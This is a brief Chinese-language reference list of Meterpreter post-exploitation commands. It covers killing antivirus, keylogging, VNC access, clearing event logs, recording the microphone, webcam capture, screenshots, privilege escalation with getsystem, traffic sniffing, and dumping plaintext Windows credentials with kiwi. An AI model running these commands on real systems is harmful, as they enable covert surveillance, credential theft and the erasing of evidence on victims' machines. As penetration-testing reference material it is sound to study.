Meterpreter常用命令:
background
返回到msf命令界面- run 执行木马自带的后台脚本,比如:
run post/windows/manage/killav
结束掉目标主机上的杀毒软件run post/windows/capture/keylog_recorder
记录键盘run vnc
与目标主机建立一个远程桌面
clearev
删除目标主机的系统日志shell
进入到目标主机命令行record_mic
开启目标主机的麦克风screenshot
截取目标主机当前截图sysinfo
查看目标主机的系统信息getuid
查看当前所使用的的用户getpid
查看meterpreter注入的进程号webcam_snap -i 1 -v false
拍照片- priv模块可以尝试提权,使用之前需要先
load priv
getsystem
提权
- sniffer流量监控模块,使用之前先
use sniffer
加载sniffer模块sniffer_interfaces
查看目标主机网卡sniffer_start 2
监听第2块网卡sniffer_stats 2
查看网卡2状态sniffer_dump 2 /tmp/test.pcap
导出网卡2的流量包到我们的/tmp/test.pcapsniffer_stop 2
停止监控
- kiwi模块,直接获取windows的明文账号密码,用之前需要先
load kiwi
,加载模块creds_all
列出所有明文账号密码和凭证